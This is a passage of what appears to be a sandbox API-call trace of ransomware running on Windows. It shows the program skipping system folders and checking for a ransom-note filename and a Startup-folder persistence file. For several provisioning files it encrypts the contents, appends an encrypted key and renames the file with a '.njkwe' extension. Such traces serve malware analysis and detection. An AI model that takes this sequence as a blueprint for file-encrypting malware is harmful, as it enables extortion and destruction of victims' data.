ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90817d73, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90817d73, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x313, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", cAlternateFileName="218__C~1.PRO")) returned 1 [0077.389] lstrcmpiW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.389] lstrcmpiW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.389] lstrcmpiW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.389] lstrcmpiW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.389] lstrcmpiW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.389] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml") returned 159 [0077.389] StrStrIW (lpFirst="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.389] lstrcmpW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.389] lstrcmpW (lpString1="218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.389] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\218__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.389] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\218__connections_cellular_claro (jamaica)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.390] GetTickCount () returned 0x1153af2 [0077.390] GetTickCount () returned 0x1153af2 [0077.390] GetTickCount () returned 0x1153af2 [0077.390] GetTickCount () returned 0x1153af2 [0077.390] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.390] GetProcessHeap () returned 0xbe0000 [0077.390] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.390] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x313, lpOverlapped=0x0) returned 1 [0077.392] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffced, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.392] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x313, lpOverlapped=0x0) returned 1 [0077.392] GetProcessHeap () returned 0xbe0000 [0077.392] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.392] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.392] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.392] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.392] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.392] CloseHandle (hObject=0x43c) returned 1 [0077.392] GetProcessHeap () returned 0xbe0000 [0077.392] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.392] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\218__connections_cellular_claro (jamaica)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\218__Connections_Cellular_Claro (Jamaica)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\218__connections_cellular_claro (jamaica)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.393] GetProcessHeap () returned 0xbe0000 [0077.393] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.393] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90817d73, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90817d73, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90817d73, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2fb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", cAlternateFileName="219__C~1.PRO")) returned 1 [0077.393] lstrcmpiW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.393] lstrcmpiW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.393] lstrcmpiW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.393] lstrcmpiW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.393] lstrcmpiW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.393] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml") returned 159 [0077.393] StrStrIW (lpFirst="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.393] lstrcmpW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.393] lstrcmpW (lpString1="219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.393] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\219__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.393] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\219__connections_cellular_claro (jamaica)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.394] GetTickCount () returned 0x1153af2 [0077.394] GetTickCount () returned 0x1153af2 [0077.394] GetTickCount () returned 0x1153af2 [0077.394] GetTickCount () returned 0x1153af2 [0077.394] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.394] GetProcessHeap () returned 0xbe0000 [0077.394] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.394] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2fb, lpOverlapped=0x0) returned 1 [0077.396] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.396] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2fb, lpOverlapped=0x0) returned 1 [0077.396] GetProcessHeap () returned 0xbe0000 [0077.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.396] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.396] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.396] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.396] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.396] CloseHandle (hObject=0x43c) returned 1 [0077.396] GetProcessHeap () returned 0xbe0000 [0077.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.396] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\219__connections_cellular_claro (jamaica)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\219__Connections_Cellular_Claro (Jamaica)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\219__connections_cellular_claro (jamaica)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.397] GetProcessHeap () returned 0xbe0000 [0077.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.397] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90163088, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90163088, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90163088, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="21__CO~1.PRO")) returned 1 [0077.397] lstrcmpiW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.397] lstrcmpiW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.397] lstrcmpiW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.397] lstrcmpiW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.397] lstrcmpiW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.397] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml") returned 162 [0077.397] StrStrIW (lpFirst="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.397] lstrcmpW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.397] lstrcmpW (lpString1="21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.397] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\21__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\21__connections_cellular_telstra (australia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.398] GetTickCount () returned 0x1153af2 [0077.398] GetTickCount () returned 0x1153af2 [0077.398] GetTickCount () returned 0x1153af2 [0077.398] GetTickCount () returned 0x1153af2 [0077.398] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.398] GetProcessHeap () returned 0xbe0000 [0077.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.398] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e4, lpOverlapped=0x0) returned 1 [0077.400] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.401] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e4, lpOverlapped=0x0) returned 1 [0077.401] GetProcessHeap () returned 0xbe0000 [0077.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.401] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.401] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.401] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.401] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.401] CloseHandle (hObject=0x43c) returned 1 [0077.401] GetProcessHeap () returned 0xbe0000 [0077.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.401] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\21__connections_cellular_telstra (australia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\21__Connections_Cellular_Telstra (Australia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\21__connections_cellular_telstra (australia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.402] GetProcessHeap () returned 0xbe0000 [0077.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.402] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90817d73, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90817d73, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90817d73, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1ee, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", cAlternateFileName="220__C~1.PRO")) returned 1 [0077.402] lstrcmpiW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.402] lstrcmpiW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.402] lstrcmpiW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.402] lstrcmpiW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.402] lstrcmpiW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.402] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml") returned 172 [0077.402] StrStrIW (lpFirst="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.402] lstrcmpW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.402] lstrcmpW (lpString1="220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.402] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\220__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\220__connections_cellular_cable and wireless (jamaica)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.403] GetTickCount () returned 0x1153af2 [0077.403] GetTickCount () returned 0x1153af2 [0077.403] GetTickCount () returned 0x1153af2 [0077.403] GetTickCount () returned 0x1153af2 [0077.403] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.403] GetProcessHeap () returned 0xbe0000 [0077.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.403] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1ee, lpOverlapped=0x0) returned 1 [0077.407] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.407] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1ee, lpOverlapped=0x0) returned 1 [0077.407] GetProcessHeap () returned 0xbe0000 [0077.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.407] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.407] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.407] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.407] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.407] CloseHandle (hObject=0x43c) returned 1 [0077.407] GetProcessHeap () returned 0xbe0000 [0077.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.407] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") 